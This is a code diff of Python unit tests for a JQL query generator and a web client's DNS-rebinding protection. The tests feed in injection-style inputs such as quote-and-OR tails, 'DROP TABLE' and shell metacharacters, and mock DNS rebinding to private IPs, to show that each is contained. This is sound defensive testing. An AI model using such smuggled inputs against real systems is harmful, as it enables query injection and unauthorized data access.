lookups +# --------------------------------------------------------------------------- + + +class TestTemplateLookups: + def test_bug_issuetype(self): + assert ( + generate_jql_from_templates("show me all bugs") + == 'issuetype = "Bug"' + ORDER_SUFFIX + ) + + def test_status_template(self): + assert ( + generate_jql_from_templates("in progress") + == 'status = "In Progress"' + ORDER_SUFFIX + ) + + def test_assignment_function_template(self): + assert ( + generate_jql_from_templates("assigned to me") + == "assignee = currentUser()" + ORDER_SUFFIX + ) + + def test_all_template_values_quote_literal_strings(self): + # Every literal-string template either quotes its value or uses a + # JQL function / operator. This is the convention the module relies on + # for safety. 
We assert the literal-value templates are quoted. + for key in ("bug", "story", "task", "epic", "blocker", "critical", "closed"): + jql = JQL_TEMPLATES[key] + # The right-hand value is wrapped in double quotes. + assert '"' in jql, f"template {key!r} should quote its value: {jql!r}" + + +# --------------------------------------------------------------------------- +# Composite patterns (only reached when no plain template matched) +# --------------------------------------------------------------------------- + + +class TestCompositePatterns: + def test_composite_only_when_no_plain_template_matches(self): + # "critical bugs" contains the plain template substring "bug", which is + # matched first (the plain-template loop runs before composites and + # breaks on first hit). Documents the actual precedence. + out = generate_jql_from_templates("critical bugs") + assert out == 'issuetype = "Bug"' + ORDER_SUFFIX + + def test_every_composite_key_is_shadowed_by_a_plain_template(self): + # Observation test (documents current behavior, not a desired guard): + # every key in COMPOSITE_PATTERNS contains a plain-template substring + # ("bug", "open", "task", "story", ...) that the earlier plain-template + # loop matches and breaks on first. As a result the composite branch is + # never reached for these keys today. If a future change makes a + # composite reachable, this test will flag the behavior shift. 
+ for key in COMPOSITE_PATTERNS: + body = generate_jql_from_templates(key).split(" ORDER BY")[0] + assert body != COMPOSITE_PATTERNS[key], ( + f"composite {key!r} unexpectedly reached the composite branch; " + "precedence assumption changed" + ) + + +# --------------------------------------------------------------------------- +# Regex patterns: project, story points, dates +# --------------------------------------------------------------------------- + + +class TestRegexPatterns: + def test_project_key_uppercased(self): + out = generate_jql_from_templates("issues in proj project") + assert "project = PROJ" in out + + def test_story_points_comparison(self): + out = generate_jql_from_templates("story points > 5") + assert '"Story Points" > 5' in out + + def test_created_after_date_quoted(self): + out = generate_jql_from_templates("created after 2024-01-15") + assert 'created >= "2024-01-15"' in out + + def test_assignee_email_quoted(self): + out = generate_jql_from_templates("assigned to alice@example.com") + assert 'assignee = "alice@example.com"' in out + + def test_quoted_phrase_becomes_text_search(self): + out = generate_jql_from_templates('search for "login timeout"') + assert 'text ~ "login timeout"' in out + + +# --------------------------------------------------------------------------- +# Labels and teams +# --------------------------------------------------------------------------- + + +class TestLabelsAndTeams: + def test_label_mapping_expands(self): + out = generate_jql_from_templates("security issues") + # Label set is unordered; assert each expected label is present. 
+ assert "labels in (" in out + for label in LABEL_MAPPINGS["security"]: + assert f'"{label}"' in out + + def test_team_membership_pattern(self): + out = generate_jql_from_templates("backend team work") + assert 'assignee in membersOf("backend-team")' in out + + +# --------------------------------------------------------------------------- +# OR vs AND combination +# --------------------------------------------------------------------------- + + +class TestCombination: + def test_or_keyword_joins_with_or(self): + # Two regex parts joined; presence of " or " switches the joiner. + out = generate_jql_from_templates("story points > 5 or story points < 1") + assert " OR " in out + assert " AND " not in out.split(" ORDER BY")[0] + + def test_default_joins_with_and(self): + out = generate_jql_from_templates("bugs assigned to bob@example.com") + body = out.split(" ORDER BY")[0] + assert " AND " in body + + +# --------------------------------------------------------------------------- +# SECURITY: injection surface — restrictive capture classes contain the value +# --------------------------------------------------------------------------- + + +class TestInjectionContainment: + def test_project_key_injection_chars_dropped(self): + # The project regex captures only [A-Z0-9]+, so trailing quote / boolean + # injection chars are not part of the value. `project = PROJ` is emitted + # unquoted but cannot be poisoned because the value is alphanumeric only. + out = generate_jql_from_templates('project PROJ" OR 1=1') + body = out.split(" ORDER BY")[0] + assert "project = PROJ" in body + # The injected boolean tail did not become part of the project clause. + assert "1=1" not in body + + def test_assignee_email_injection_bounded_by_charclass(self): + # The email char class [a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+ stops at the + # first non-matching char, so a closing quote / OR cannot land *inside* + # the assignee value's quotes. 
+ out = generate_jql_from_templates('assigned to evil@example.com" OR "1"="1') + # The assignee clause quotes exactly the email, nothing more. + assert 'assignee = "evil@example.com"' in out + # The injected boolean did not fuse into the assignee value. + assert 'assignee = "evil@example.com" OR "1"="1"' not in out + + def test_assignee_value_has_no_unescaped_break_in_clause(self): + out = generate_jql_from_templates("assigned to user@corp.io") + # Exactly one assignee clause with a single quoted value. + assert out.count('assignee = "') == 1 + clause = 'assignee = "user@corp.io"' + assert clause in out + + def test_story_points_only_accepts_digits(self): + # The Story Points comparison regex requires \d+, so a non-numeric + # "value" never reaches it and the injected text is not interpolated + # into a "Story Points" comparison clause. + out = generate_jql_from_templates("story points > abc; DROP TABLE") + assert '"Story Points" >' not in out + assert "DROP TABLE" not in out + + def test_no_shell_or_jql_metachars_leak_for_garbage_input(self): + # Pure garbage with metacharacters falls through to the safe default. + out = generate_jql_from_templates(";`$(){}[]<>") + assert out == "created >= -30d" + ORDER_SUFFIX + + +# --------------------------------------------------------------------------- +# Structural sanity of the static tables +# --------------------------------------------------------------------------- + + +class TestStaticTables: + def test_regex_patterns_are_callable_pairs(self): + for pattern, generator in REGEX_PATTERNS: + assert isinstance(pattern, str) + assert callable(generator) + + def test_order_patterns_start_with_order_by(self): + for clause in ORDER_PATTERNS.values(): + assert clause.startswith("ORDER BY ") + + def test_composite_patterns_combine_conditions(self): + # Each composite has at least one boolean joiner or function call. 
+ for jql in COMPOSITE_PATTERNS.values(): + assert " AND " in jql or " OR " in jql or "(" in jql + + def test_team_patterns_use_membersof(self): + for jql in TEAM_PATTERNS.values(): + assert "membersOf(" in jql diff --git a/tests/unit/test_web_client_ip_pinning.py b/tests/unit/test_web_client_ip_pinning.py index 4b53ae98c..07385424c 100644 --- a/tests/unit/test_web_client_ip_pinning.py +++ b/tests/unit/test_web_client_ip_pinning.py @@ -2,9 +2,10 @@ import threading from unittest.mock import MagicMock, patch +import pytest import requests -from gaia.web.client import PinnedIPAdapter +from gaia.web.client import PinnedIPAdapter, WebClient def test_ip_pinning_blocks_rebind_to_private_ip(monkeypatch): @@ -16,7 +17,7 @@ def test_ip_pinning_blocks_rebind_to_private_ip(monkeypatch): def fake_getaddrinfo(host, port, *args, **kwargs): calls["count"] += 1 if calls["count"] == 1: - return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("203.0.113.10", port))] + return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("8.8.8.8", port))] return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("10.0.0.5", port))] monkeypatch.setattr(socket, "getaddrinfo", fake_getaddrinfo) @@ -36,12 +37,12 @@ def fake_getaddrinfo(host, port, *args, **kwargs): resp = adapter.send(req) # Adapter should have rewritten the URL to use the first resolved IP - assert "203.0.113.10" in req.url + assert "8.8.8.8" in req.url assert resp.status_code == 200 # Cache should store the resolved IP key = ("example.local", 80) - assert adapter._pinned_cache.get(key) == "203.0.113.10" + assert adapter._pinned_cache.get(key) == "8.8.8.8" def test_ip_pinning_prevents_dns_rebind(monkeypatch): @@ -52,7 +53,7 @@ def test_ip_pinning_prevents_dns_rebind(monkeypatch): def fake_getaddrinfo(host, port, *args, **kwargs): states["calls"] += 1 if states["calls"] == 1: - return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("198.51.100.7", port))] + return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("8.8.8.8", port))] # Rebind to 
loopback on later calls return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("127.0.0.1", port))] @@ -65,18 +66,18 @@ def fake_getaddrinfo(host, port, *args, **kwargs): mock_response._content = b"ok" with patch.object(PinnedIPAdapter.__bases__[0], "send", return_value=mock_response): - # First request pins 198.51.100.7 + # First request pins 8.8.8.8 r1_req = requests.Request("GET", "http://example.local/first").prepare() mock_response.request = r1_req adapter.send(r1_req) - assert "198.51.100.7" in r1_req.url + assert "8.8.8.8" in r1_req.url # Second request — getaddrinfo would return 127.0.0.1, - # but adapter uses cached 198.51.100.7 + # but adapter uses cached 8.8.8.8 r2_req = requests.Request("GET", "http://example.local/second").prepare() mock_response.request = r2_req adapter.send(r2_req) - assert "198.51.100.7" in r2_req.url + assert "8.8.8.8" in r2_req.url def test_https_pinning_preserves_tls_hostname(monkeypatch): @@ -143,9 +144,9 @@ def test_concurrent_https_requests_use_correct_tls_hostname(monkeypatch): def fake_getaddrinfo(host, port, *args, **kwargs): ips = { "alpha.example.com": "93.184.216.34", - "beta.example.com": "198.51.100.1", + "beta.example.com": "1.1.1.1", } - ip = ips.get(host, "203.0.113.1") + ip = ips.get(host, "8.8.8.8") return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (ip, port))] monkeypatch.setattr(socket, "getaddrinfo", fake_getaddrinfo) @@ -154,36 +155,40 @@ def fake_getaddrinfo(host, port, *args, **kwargs): results = {} errors = [] + mock_resp = requests.Response() + mock_resp.status_code = 200 + mock_resp._content = b"ok" + def make_request(hostname): try: req = requests.Request("GET", f"https://{hostname}/path").prepare() - mock_resp = requests.Response() - mock_resp.status_code = 200 - mock_resp._content = b"ok" - mock_resp.request = req - - with patch.object( - PinnedIPAdapter.__bases__[0], "send", return_value=mock_resp - ): - adapter.send(req) - - mock_pool = MagicMock() - with patch.object( - PinnedIPAdapter.__bases__[0], 
"get_connection", return_value=mock_pool - ): - pool = adapter.get_connection(req.url) + adapter.send(req) + pool = adapter.get_connection(req.url) results[hostname] = pool.assert_hostname except Exception as exc: errors.append(exc) - threads = [ - threading.Thread(target=make_request, args=("alpha.example.com",)), - threading.Thread(target=make_request, args=("beta.example.com",)), - ] - for t in threads: - t.start() - for t in threads: - t.join() + # Install the transport + pool-factory patches ONCE around both threads. + # Patching a shared class method inside each thread races on install/ + # teardown and can leak a real network call; a single install is safe. + # get_connection returns a FRESH mock per call so each request gets its + # own pool — the per-hostname isolation under test. + with ( + patch.object(PinnedIPAdapter.__bases__[0], "send", return_value=mock_resp), + patch.object( + PinnedIPAdapter.__bases__[0], + "get_connection", + side_effect=lambda *a, **k: MagicMock(), + ), + ): + threads = [ + threading.Thread(target=make_request, args=("alpha.example.com",)), + threading.Thread(target=make_request, args=("beta.example.com",)), + ] + for t in threads: + t.start() + for t in threads: + t.join() assert not errors, f"Threads raised: {errors}" assert results["alpha.example.com"] == "alpha.example.com" @@ -206,39 +211,43 @@ def fake_getaddrinfo(host, port, *args, **kwargs): errors = [] barrier = threading.Barrier(2, timeout=5) + mock_resp = requests.Response() + mock_resp.status_code = 200 + mock_resp._content = b"ok" + def make_request(hostname): try: req = requests.Request("GET", f"https://{hostname}/path").prepare() - mock_resp = requests.Response() - mock_resp.status_code = 200 - mock_resp._content = b"ok" - mock_resp.request = req - - with patch.object( - PinnedIPAdapter.__bases__[0], "send", return_value=mock_resp - ): - adapter.send(req) + adapter.send(req) # Synchronize so both threads call get_connection concurrently barrier.wait() - mock_pool = 
MagicMock() - with patch.object( - PinnedIPAdapter.__bases__[0], "get_connection", return_value=mock_pool - ): - pool = adapter.get_connection(req.url) + pool = adapter.get_connection(req.url) results[hostname] = pool.assert_hostname except Exception as exc: errors.append(exc) - threads = [ - threading.Thread(target=make_request, args=("site-a.example.com",)), - threading.Thread(target=make_request, args=("site-b.example.com",)), - ] - for t in threads: - t.start() - for t in threads: - t.join() + # Single install of the patches (see sibling test): per-thread context + # managers race on teardown and can leak a real connection. A fresh mock + # pool per get_connection call proves each host keeps its own + # assert_hostname even though both resolve to the same pinned IP. + with ( + patch.object(PinnedIPAdapter.__bases__[0], "send", return_value=mock_resp), + patch.object( + PinnedIPAdapter.__bases__[0], + "get_connection", + side_effect=lambda *a, **k: MagicMock(), + ), + ): + threads = [ + threading.Thread(target=make_request, args=("site-a.example.com",)), + threading.Thread(target=make_request, args=("site-b.example.com",)), + ] + for t in threads: + t.start() + for t in threads: + t.join() assert not errors, f"Threads raised: {errors}" # Even though both resolve to the same IP, each gets its own hostname @@ -261,3 +270,106 @@ def test_strip_tls_host_without_userinfo(): clean, hostname = PinnedIPAdapter._strip_tls_host(url) assert hostname is None assert clean == url + + +# ============================================================================ +# DNS-rebind TOCTOU: validate_url sees a PUBLIC IP, the adapter's own lookup +# sees a PRIVATE IP. The adapter must validate the IP it actually pins/dials +# and BLOCK — not connect to the private address. 
+# ============================================================================ + + +def test_adapter_blocks_rebind_when_pinned_ip_is_private(monkeypatch): + """The adapter's own resolution returns a private IP — pinning + must reject it rather than caching/dialing it. + + ``_resolve_first_ip`` performs a single ``getaddrinfo``, so the fixture + returns the rebound private IP directly: the contract under test is that + the adapter validates the exact address it is about to pin/dial. + """ + + def fake_getaddrinfo(host, port, *args, **kwargs): + return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("10.0.0.5", port))] + + monkeypatch.setattr(socket, "getaddrinfo", fake_getaddrinfo) + + adapter = PinnedIPAdapter() + # super().send must NOT be reached — validation happens before connect. + with patch.object( + PinnedIPAdapter.__bases__[0], "send", side_effect=AssertionError("connected!") + ): + with pytest.raises(ValueError, match="private/reserved IP"): + adapter._resolve_first_ip("example.local", 80) + + # Poisoned IP must NOT be cached — a later safe lookup should be retryable. + assert ("example.local", 80) not in adapter._pinned_cache + + +def test_full_request_blocked_when_rebind_returns_private_ip(monkeypatch): + """End-to-end through WebClient.get: validate_url's resolution returns a + public IP (passes the pre-flight), but the adapter's resolution returns a + private IP. The fetch must raise and NEVER reach the transport.""" + calls = {"count": 0} + + def fake_getaddrinfo(host, port=None, *args, **kwargs): + calls["count"] += 1 + # Call 1 = WebClient.validate_url -> _validate_host_ip (public, OK). + # Call 2 = PinnedIPAdapter._resolve_first_ip (rebound to private). 
+ if calls["count"] == 1: + return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("8.8.8.8", 0))] + return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("10.0.0.5", port or 0))] + + monkeypatch.setattr(socket, "getaddrinfo", fake_getaddrinfo) + + client = WebClient() + try: + # Patch the underlying transport so a "successful" connect would be + # observable — it must never be invoked. + with patch.object( + PinnedIPAdapter.__bases__[0], + "send", + side_effect=AssertionError("transport reached private IP"), + ): + with pytest.raises(ValueError, match="private/reserved IP"): + client.get("http://rebind.example/path") + finally: + client.close() + + +def test_full_request_succeeds_for_public_host(monkeypatch): + """Positive path: a normal public host resolves to a public IP on both + lookups and the request completes through the (mocked) transport.""" + + def fake_getaddrinfo(host, port=None, *args, **kwargs): + return [ + (socket.AF_INET, socket.SOCK_STREAM, 6, "", ("93.184.216.34", port or 0)) + ] + + monkeypatch.setattr(socket, "getaddrinfo", fake_getaddrinfo) + + client = WebClient() + try: + mock_response = requests.Response() + mock_response.status_code = 200 + mock_response.headers["Content-Type"] = "text/html" + mock_response._content = b"
ok
" + mock_response._content_consumed = True + mock_response.encoding = "utf-8" + + with patch.object( + PinnedIPAdapter.__bases__[0], "send", return_value=mock_response + ): + with patch.object(client, "_rate_limit_wait"): + resp = client.get("http://public.example/page") + + assert resp.status_code == 200 + assert b"ok" in resp.content + # Adapter pinned the validated public IP. + assert ( + client._session.get_adapter("http://public.example/")._pinned_cache[ + ("public.example", 80) + ] + == "93.184.216.34" + ) + finally: + client.close()